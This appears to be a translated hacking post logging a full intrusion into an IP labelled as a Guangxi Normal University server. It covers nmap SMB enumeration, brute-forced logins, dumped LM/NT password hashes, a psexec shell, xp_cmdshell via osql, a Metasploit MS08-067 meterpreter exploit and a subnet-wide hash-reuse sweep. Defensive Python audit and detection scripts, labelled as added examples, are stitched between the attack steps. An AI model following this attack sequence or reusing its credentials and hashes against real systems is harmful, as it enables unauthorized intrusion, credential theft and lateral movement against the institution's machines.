Guangxi Normal University website http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb    // list the scan scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// use the script to enumerate the account names that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_ Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser    // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// view the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
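The two scans above (the service-version port table from the first nmap run and the smb-enum-shares result) are exactly what a defender can collect against their own hosts. As an added example, not code from the original post or from the Nmap project, the Python script below parses that nmap normal-format text and turns it into findings an owner of the host would act on: RPC, NetBIOS, SMB, MSDTC and RDP reachable from the scanning host, a service banner that reports an end-of-life operating system, and a share that permits anonymous (null-session) access. The sample text is copied from the post's output; the severity labels, the list of risky ports and the regular expressions are this example's own assumptions about Nmap 5.x output.

```python
"""Audit nmap normal-format output for legacy Windows exposure.

Added example (not from the original post or the Nmap project). It reads
the port table and the `Host script results:` block of smb-enum-shares
and raises findings: risky services reachable, an end-of-life OS banner,
and shares that allow anonymous access.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List

# Services that should never be reachable from an untrusted network
# (assumption of this example: what counts as "risky" is a policy choice).
RISKY_PORTS = {
    135: "MSRPC endpoint mapper reachable",
    139: "NetBIOS session service reachable",
    445: "SMB (microsoft-ds) reachable",
    3372: "MSDTC reachable",
    3389: "Terminal Services (RDP) reachable",
}

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
SHARE_RE = re.compile(r"^\|\s+([A-Za-z0-9_]+\$?)\s*$")        # "|   IPC$"
ACCESS_RE = re.compile(r"^\|_?\s*Anonymous access:\s+(\S+)")  # "|_    Anonymous access: READ"
EOL_OS_RE = re.compile(r"Windows 2000")  # out of extended support since July 2010


@dataclass
class Finding:
    severity: str
    message: str


@dataclass
class Report:
    open_ports: Dict[int, str] = field(default_factory=dict)  # port -> service name
    shares: Dict[str, str] = field(default_factory=dict)      # share -> anonymous access level
    findings: List[Finding] = field(default_factory=list)


def parse_report(text: str) -> Report:
    """Walk the report line by line; share lines only count after 'Host script results:'."""
    rep = Report()
    in_scripts = False
    current_share = None
    for raw in text.splitlines():
        line = raw.rstrip()
        if line.startswith("Host script results:"):
            in_scripts = True
            continue
        m = PORT_RE.match(line)
        if m:
            if m.group(3) != "open":
                continue
            port, service = int(m.group(1)), m.group(4)
            version = (m.group(5) or "").strip()
            rep.open_ports[port] = service
            if port in RISKY_PORTS:
                rep.findings.append(Finding("high", f"{port}/tcp {service}: {RISKY_PORTS[port]}"))
            if EOL_OS_RE.search(version):
                rep.findings.append(Finding("high", f"{port}/tcp banner reports an end-of-life OS: {version}"))
            continue
        if not in_scripts:
            continue
        m = SHARE_RE.match(line)
        if m:
            current_share = m.group(1)
            continue
        m = ACCESS_RE.match(line)
        if m and current_share:
            access = m.group(1)
            rep.shares[current_share] = access
            if access != "<none>":
                rep.findings.append(Finding(
                    "medium", f"share {current_share} grants anonymous {access} access (null session allowed)"))
            current_share = None
    return rep


# Sample input copied from the post (first scan's port table plus the smb-enum-shares block).
SAMPLE = """\
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\\winnt\\system32\\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\\winnt\\system32\\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ
"""

if __name__ == "__main__":
    for f in parse_report(SAMPLE).findings:
        print(f"[{f.severity}] {f.message}")
```

Run against the post's output it yields seven findings: five reachable legacy services, the Windows 2000 banner, and the anonymous READ on IPC$, which is the null session that lets the later user and share enumeration work at all. The fix on a Windows 2000-era host is the `RestrictAnonymous` policy plus a host firewall in front of 135/139/445; on anything current, disabling SMBv1 and blocking those ports at the network edge.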

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// obtain user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds

root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2    // grab the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
|   Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
|   Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
|   test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_  TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
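The smb-pwdump table is the same thing an administrator sees when auditing their own SAM, and it already says a lot before anyone tries to crack it. As an added example, not code from the original post, from pwdump or from Nmap, the Python script below parses those lines (both the `user:rid => LM:NT` form printed above and the classic `user:rid:LM:NT:::` pwdump form) and reports the weaknesses the hashes reveal on their own: blank passwords, LM hashes still being stored (the NoLMHash policy not enforced), and a second LM block equal to the empty-block constant, which tells anyone holding the dump that the password has at most 7 characters. The only constants used are the well-known LM and NT hashes of the empty password; the severity labels are this example's assumption.

```python
"""Audit a dumped SAM hash table for weak password hygiene.

Added example (not from the original post, pwdump or Nmap). Nothing is
cracked; the checks rely only on the structure of LM/NT hashes and the
well-known empty-password constants.
"""
from dataclasses import dataclass
from typing import List, Optional

LM_EMPTY_HALF = "AAD3B435B51404EE"             # LM block for 7 null bytes: password shorter than 8 chars
LM_EMPTY = LM_EMPTY_HALF * 2                   # LM hash of the empty password
NT_EMPTY = "31D6CFE0D16AE931B73C59D7E0C089C0"  # MD4 of the empty UTF-16LE password


@dataclass
class Account:
    user: str
    rid: int
    lm: str
    nt: str


def parse_line(line: str) -> Optional[Account]:
    """Accept 'user:rid => LM:NT' (smb-pwdump) or 'user:rid:LM:NT:::' (pwdump); else None."""
    body = line.strip().lstrip("|_").strip()   # drop the NSE output prefix
    if " => " in body:
        ident, hashes = body.split(" => ", 1)
        user, rid = ident.rsplit(":", 1)
        lm, nt = hashes.split(":", 1)
    elif body.count(":") >= 3:
        user, rid, lm, nt = body.split(":")[:4]
    else:
        return None                            # header such as "| smb-pwdump:"
    return Account(user.strip(), int(rid), lm.strip().upper(), nt.strip().upper())


def is_blank(h: str, empty_const: str) -> bool:
    """pwdump prints 'NO PASSWORD***' for the empty hash; raw dumps show the constant itself."""
    return h.startswith("NO PASSWORD") or h == empty_const


def audit(acct: Account) -> List[str]:
    out = []
    if is_blank(acct.nt, NT_EMPTY):
        # Enabled/disabled state is not in the dump (Guest is normally disabled),
        # so a blank Guest is a prompt to verify, a blank RID 500 is an emergency.
        level = "CRITICAL" if acct.rid == 500 else "HIGH"
        out.append(f"{level}: {acct.user} (RID {acct.rid}) has a blank password")
    if not is_blank(acct.lm, LM_EMPTY):
        out.append(f"HIGH: {acct.user} has an LM hash stored; enforce NoLMHash and rotate the password")
        if acct.lm[16:] == LM_EMPTY_HALF:
            out.append(f"HIGH: {acct.user}: password is at most 7 characters (second LM block is empty)")
    return out


def audit_dump(text: str) -> List[str]:
    findings = []
    for line in text.splitlines():
        acct = parse_line(line)
        if acct is not None:
            findings.extend(audit(acct))
    return findings


# Sample input: the smb-pwdump table from the post.
SAMPLE = """\
| smb-pwdump:
|   Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
|   Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
|   test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_  TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
"""

if __name__ == "__main__":
    for finding in audit_dump(SAMPLE):
        print(finding)
```

On the post's table this flags the blank Administrator password first, then the two accounts whose LM hashes are stored at all, and singles out `test` as a 7-character-or-shorter password from its second LM block alone. The LM hash is the reason the later network-wide smb-brute run can use a hash file instead of a password file, so the most effective single fix is the NoLMHash policy followed by a password change for every affected account.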

C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe    // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

        Connection-specific DNS Suffix . :
        IP Address. . . . . . . . . . . . : 202.103.242.241
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user' "    // log in remotely as sa and execute a command

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241    // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

root@bt:~# msfconsole    // exploit the MS08-067 vulnerability against the target machine from msf
msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N] (ctrl+z)
msf exploit(ms08_067_netapi) > sessions -l

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// use the usernames together with the captured hash to try logging in across the whole internal subnet

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Attack successful, a simple msf + nmap attack~~
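The closing smb-brute run over 192.168.1.1-254 with a reused account and hash is the pattern that should light up on the defending side: one source trying the same account against many hosts in seconds, a burst of failures against one host, and then a success from a source that has just been failing. As an added example, not code from the original post, the Python detector below runs those three rules over a small set of authentication events. The event line format, field names and thresholds are this example's own assumptions; the events are constructed for the example, and in practice they would come from Windows Security logon events (failed/successful network logons) or from an SMB-aware network sensor.

```python
"""Detect SMB logon sweeps and brute-force bursts in authentication events.

Added example (not from the original post). Event format is constructed:
one event per line, 'ISO-time source_ip target_host user SUCCESS|FAIL'.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import List, Tuple

FAIL_THRESHOLD = 5             # failed logons from one source to one host within WINDOW
SPREAD_THRESHOLD = 3           # distinct hosts one source tries the same account against within WINDOW
WINDOW = timedelta(minutes=2)  # thresholds and window are this example's assumptions

Event = Tuple[datetime, str, str, str, bool]   # (time, source_ip, target_host, user, success)


def parse_events(text: str) -> List[Event]:
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, src, dst, user, result = line.split()
        events.append((datetime.fromisoformat(ts), src, dst, user.lower(), result == "SUCCESS"))
    return sorted(events, key=lambda e: e[0])


def detect(events: List[Event]) -> List[str]:
    """Apply three rules over a sliding time window; one alert per (rule, source, ...) key."""
    alerts = {}
    fails = defaultdict(list)      # (src, dst)  -> failure timestamps inside the window
    spread = defaultdict(list)     # (src, user) -> (timestamp, dst) inside the window
    sources_with_failures = set()
    for ts, src, dst, user, ok in events:
        if ok:
            # Rule 3: a success from a source that has already produced failures.
            if src in sources_with_failures:
                alerts[("success-after-failure", src, dst, user)] = (
                    f"success-after-failure: {src} logged on to {dst} as '{user}' after earlier failures")
        else:
            # Rule 1: failure burst against a single host.
            fails[(src, dst)] = [t for t in fails[(src, dst)] if ts - t <= WINDOW] + [ts]
            sources_with_failures.add(src)
            n = len(fails[(src, dst)])
            if n >= FAIL_THRESHOLD:
                alerts[("brute-force", src, dst)] = f"brute-force: {src} -> {dst}: {n} failed logons within {WINDOW}"
        # Rule 2: one account tried against many hosts (success or failure both count).
        spread[(src, user)] = [(t, d) for t, d in spread[(src, user)] if ts - t <= WINDOW] + [(ts, dst)]
        hosts = {d for _, d in spread[(src, user)]}
        if len(hosts) >= SPREAD_THRESHOLD:
            alerts[("lateral-sweep", src, user)] = (
                f"lateral-sweep: {src} tried '{user}' against {len(hosts)} hosts within {WINDOW}")
    return sorted(alerts.values())


# Constructed sample: 10.0.0.5 plays the host running the sweep; 192.168.1.20 is a normal user.
SAMPLE_EVENTS = """\
2012-02-29T01:00:00 10.0.0.5 192.168.1.101 administrator FAIL
2012-02-29T01:00:01 10.0.0.5 192.168.1.102 administrator FAIL
2012-02-29T01:00:02 10.0.0.5 192.168.1.103 administrator FAIL
2012-02-29T01:00:03 10.0.0.5 192.168.1.105 administrator SUCCESS
2012-02-29T01:00:10 10.0.0.5 192.168.1.105 test FAIL
2012-02-29T01:00:11 10.0.0.5 192.168.1.105 test FAIL
2012-02-29T01:00:12 10.0.0.5 192.168.1.105 test FAIL
2012-02-29T01:00:13 10.0.0.5 192.168.1.105 test FAIL
2012-02-29T01:00:14 10.0.0.5 192.168.1.105 test FAIL
2012-02-29T01:05:00 192.168.1.20 192.168.1.105 alice SUCCESS
"""

if __name__ == "__main__":
    for alert in detect(parse_events(SAMPLE_EVENTS)):
        print(alert)
```

The lateral-sweep rule counts successes as well as failures on purpose: a reused local Administrator password, as in the post, succeeds on the first try on every host that shares it, so a failure-only rule would miss the sweep entirely. The corresponding mitigation is unique local administrator passwords per host (or no enabled local admin at all) and the NoLMHash policy, so that a hash from one machine cannot be replayed against the rest of the subnet.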